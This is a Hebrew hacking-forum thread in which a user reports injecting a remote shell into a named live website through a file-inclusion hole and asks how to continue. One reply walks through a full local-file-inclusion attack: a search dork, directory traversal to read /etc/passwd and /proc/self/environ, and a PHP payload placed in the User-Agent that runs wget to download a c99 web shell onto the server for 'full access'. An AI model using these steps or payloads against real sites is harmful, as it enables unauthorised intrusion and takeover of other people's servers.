קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. תגובות: 2
    הודעה אחרונה: 19-07-2007, 15:53
  2. מצאתי אתר שנותן פורום לאתר בחינם!
    על ידי v052 בפורום דיבורים
    תגובות: 1
    הודעה אחרונה: 08-06-2007, 18:54
  3. תגובות: 1
    הודעה אחרונה: 30-12-2006, 17:26
+ תגובה לנושא
מציג תוצאות 1 עד 3 מתוך 3

אוקי, מצאתי אתר עם פירצת RFI. התקדמתי העלתי שאאל, קיבלתי תגובה. מה עכשיו?

  1. #1
    משתמש משקיע האוואטר של OverPowered
    שם פרטי
    ניק
    תאריך הצטרפות
    04/2010
    הודעות
    4,248
    לייקים
    691
    נקודות
    6
    משפט מחץ
    You know what your problem is... I'm too good looking
    מין: זכר

    Exclamation אוקי, מצאתי אתר עם פירצת RFI. התקדמתי העלתי שאאל, קיבלתי תגובה. מה עכשיו?

    אוקי הכנסתי את השאאל לאתר
    http://www.jlc-software.com/index.ph...com/shell2.txt
    כמובן במקום הBLABLA זה האחסון שלי שעליו נמצא השאאל.

    קיבלתי תגובת שרת, שגיאה:
    Warning: include(): http:// wrapper is disabled in the server configuration by allow_url_include=0 in /customers/jlc-software.com/jlc-software.com/httpd.www/index.php on line 37 Warning: include(http://blabla.com/shell2.txt): failed to open stream: no suitable wrapper could be found in /customers/jlc-software.com/jlc-software.com/httpd.www/index.php on line 37 Warning: include(): Failed opening 'http://blabla.com/shell2.txt' for inclusion (include_path='.:/usr/share/php') in /customers/jlc-software.com/jlc-software.com/httpd.www/index.php on line 37
    ניסיתי לעשות את זה עם כל מיני אפשרויות, להוסיף hthttptp://blabla.com/shell2.txt

    איך להמשיך בעצם מפה?
    תודה למי שיעזור!
    נערך לאחרונה על ידי OverPowered; 23-01-2011 בשעה 22:27.



  2. קישורים ממומנים

  3. #2
    משתמש מתחיל
    שם פרטי
    XxX
    תאריך הצטרפות
    01/2011
    הודעות
    160
    לייקים
    0
    נקודות
    50
    משפט מחץ
    pain is temporary glory is forever,never give up
    מין: זכר

    ברירת מחדל

    LFI ..
    אוקיי . אז קודם כל אתה צריך
    לבדוק אם proc/self/environ/ נגיש ..
    אני אנסה להסביר לך את המתקפה בצד אחר , אולי כך תבין יותר
    איך בעצם המתקפה מתרחשת ?
    כאשר ה אינקלוד לא מתוכנת כראוי , על מנת להמחיש את המתקפה אתה צריך להשתמש בדורק.
    לדוגמא :
    קוד PHP:
    inurl:index.php?id=news.php 
    מצאנו את האתר :
    קוד PHP:
    www.ne0-software.com/index.php?id=news.php 
    מה בעצם קרה פה ?
    הפננו לקובץ news.php , כך אתה בודק אם קיימת פירצת LFI .

    אוקיי עכשיו אנחנו צריכים להגיע לקובץ
    /etc/passwd

    כל מה שאנחנו צריכים לעשות זה להשתמש ב ../ על מנת לעלות ולרדת תיקייה .

    לדוגמא :
    קוד PHP:
    http://ne0/index.php?id=../ 
    כעת תתקבל לך שגיאה :
    קוד:
    Warning: include(../) [function.include]: failed to open stream: No  such file or directory in /home/user/public_html/ne0-software.com/view.php on  line 2
    אז עכשיו אנחנו מחפשים איפה נמצא הקובץ etc/passwd , אם יש שגיאה זה אומר שאנחנו לא במקום המתאים ..

    קוד:
    http:/ne0-software.com/index.php?id=../ ../../../../../../etc/passwd
    כעת אנחנו רואים שאין שום שגיאה ,
    ננסה לנקלד את הקובץ .

    יופיע לך סקריפט בסגנון הבא :
    קוד:
     root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/
    עכשיו אנחנו רואים אם יש גישה לקובץ proc/self/environ , ננסה .. :
    קוד PHP:
    tp://ne0-software.com/index.php?id=../ ../../../../../../proc/self/environ 
    במידה ויש גישה הקובץ אמור להראות כך :
    קוד:
    DOCUMENT_ROOT=/home/user/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html
    עכשיו אנחנו רוצים לעלות שאלל, איך זה עובד ?, אם אתם תראו בקובץ proc/self/environ הוא יראה לכם את הuser agent שלכם ..

    עכשיו אנחנו יכולים לעשות ככה, על מנת לעלות שאלל, נכנס דרך FF נכנס לuser agent ונשנה אותו לקוד הPHP שלהלן, מה שהוא עושה, הוא משתמש בפקודת WGET על מנת להוריד לשרת את הקובץ הזדוני..
    קוד PHP:
    <?system('wget http://ne0-software.com/c99.txt -O c99.php');?>
    כעת יש לך גישה מלאה ,
    ואתה מוזמן להנות

    דרך צלחה ידידי .
    </span>
    \ ´¯\).........(/¯`/
    \....\\............//..../
    \....\\Ne0//..../
    \´¯\....\´¯/...........\¯`/..../¯`/
    \.\...\....\....\.|_......_|./..../..../..././
    (.(....(....(....\.)..)..(..(./...)....)....).)
    /.............../\...\..../.../\...............\
    /.................\......../.................\


  4. #3
    משתמש מתקדם
    שם פרטי
    חסוי
    תאריך הצטרפות
    10/2010
    הודעות
    885
    לייקים
    22
    נקודות
    -59
    משפט מחץ
    ):
    מין: זכר

    ברירת מחדל

    ne0..מה אני אגיד לך אתה הסברת את הנושא מצויין ,
    ממליץ לך לפתוח מדריך הממה שכבר כתבת ...
    אגב יש הבדל בין RFI - LFI .
    RFI - יבוא קובץ מרוחק
    lfi - יבוא קובץ מקומי .
    אם אתה עוד חומר ..
    כנס לכאן ותראה כבר את החומר (:
    נערך לאחרונה על ידי Num32; 25-01-2011 בשעה 18:24.

    מנהל אבטחת מידע לשעבר.

+ תגובה לנושא


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 06:54.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,472,574 | הודעות: 8,173,161 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect